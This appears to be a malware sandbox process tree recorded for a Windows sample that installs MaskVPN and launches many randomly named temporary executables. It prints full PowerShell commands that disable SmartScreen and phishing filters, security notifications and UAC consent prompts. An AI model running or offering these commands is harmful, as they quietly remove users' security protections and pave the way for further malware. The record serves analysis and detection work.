$key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Maintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'MaintenanceDisabled' -Value 1; $key='HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Maintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'MaintenanceDisabled' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKCU:\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\software\microsoft\windows\currentversion\AppHost';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableWebContentEvaluation' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AllowTelemetry' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DoNotShowFeedbackNotifications' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Personalization\Settings';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AcceptedPrivacyPolicy' -Value 0; $key='HKLM:\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Start' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Input\TIPC';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\Software\Microsoft\Internet Explorer\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV8' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKLM:\software\microsoft\windows\currentversion\policies\system';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableLUA' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'ConsentPromptBehaviorAdmin' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'PromptOnSecureDesktop' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableInstallerDetection' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'ConsentPromptBehaviorUser' -Value 3; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableSecureUIAPaths' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'ValidateAdminCodeSignatures' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableVirtualization' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableUIADesktopToggle' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'FilterAdministratorToken' -Value 0; $key='HKLM:\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\SQMLogger';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Start' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\AppCompat';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AITEnable' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableUAR' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\InputPersonalization';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'RestrictImplicitInkCollection' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'RestrictImplicitTextCollection' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'HarvestContacts' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\TabletPC';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PreventHandwritingDataSharing' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\HandwritingErrorReports';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PreventHandwritingErrorReports' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\SQMClient\Windows';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'CEIPEnable' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'CorporateSQMURL' -Value '0.0.0.0';4⤵PID:6068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" $key='HKLM:\SOFTWARE\Policies\Microsoft\Office\16.0\osm';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enablelogging' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableUpload' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Siuf\Rules';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'NumberOfSIUFInPeriod' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'PeriodInNanoSeconds' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Assistance\Client\1.0';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'NoExplicitFeedback' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\MediaPlayer\Preferences';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'UsageTracking' -Value 0;4⤵PID:1348
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D6A9.tmp.exeC:\Users\Admin\AppData\Local\Temp\D6A9.tmp.exe2⤵PID:1104
-
-
C:\Users\Admin\AppData\Local\Temp\E418.tmp.exeC:\Users\Admin\AppData\Local\Temp\E418.tmp.exe2⤵PID:1212
-
-
C:\Users\Admin\AppData\Local\Temp\F60B.tmp.exeC:\Users\Admin\AppData\Local\Temp\F60B.tmp.exe2⤵PID:972
-
-
C:\Users\Admin\AppData\Local\Temp\225B.tmp.exeC:\Users\Admin\AppData\Local\Temp\225B.tmp.exe2⤵PID:6488
-
-
C:\Users\Admin\AppData\Local\Temp\36CF.tmp.exeC:\Users\Admin\AppData\Local\Temp\36CF.tmp.exe2⤵PID:8668
-
-
C:\Users\Admin\AppData\Local\Temp\4F0B.tmp.exeC:\Users\Admin\AppData\Local\Temp\4F0B.tmp.exe2⤵PID:6596
-
-
C:\Users\Admin\AppData\Local\Temp\6822.tmp.exeC:\Users\Admin\AppData\Local\Temp\6822.tmp.exe2⤵PID:7764
-
-
C:\Users\Admin\AppData\Local\Temp\7D60.tmp.exeC:\Users\Admin\AppData\Local\Temp\7D60.tmp.exe2⤵PID:7080
-
-
C:\Users\Admin\AppData\Local\Temp\B191.tmp.exeC:\Users\Admin\AppData\Local\Temp\B191.tmp.exe2⤵PID:1680
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:3132
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:156
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:1932
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:8844
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:4948
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:8912
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:6184
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:7876
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:4072
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:3556
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{5331670c-6684-4c47-8370-6677c89e185b}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:1520
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180"2⤵PID:6344
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:6416
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:6408
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:2716
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:3752
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:7824
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵PID:8492
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵PID:7384
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵PID:1836
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:8672
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:8816
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8388
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\098815be6b3a411ea9eaaed6cdc29b13 /t 8344 /p 88161⤵PID:5176
-
C:\Windows\system32\wlrmdr.exe-s -1 -f 2 -t You're about to be signed out -m Windows will shut down in less than a minute. -a 31⤵PID:6920
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3af6855 /state1:0x41c64e6d1⤵PID:7944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:7720
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:7920
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:3228
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2712
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:7052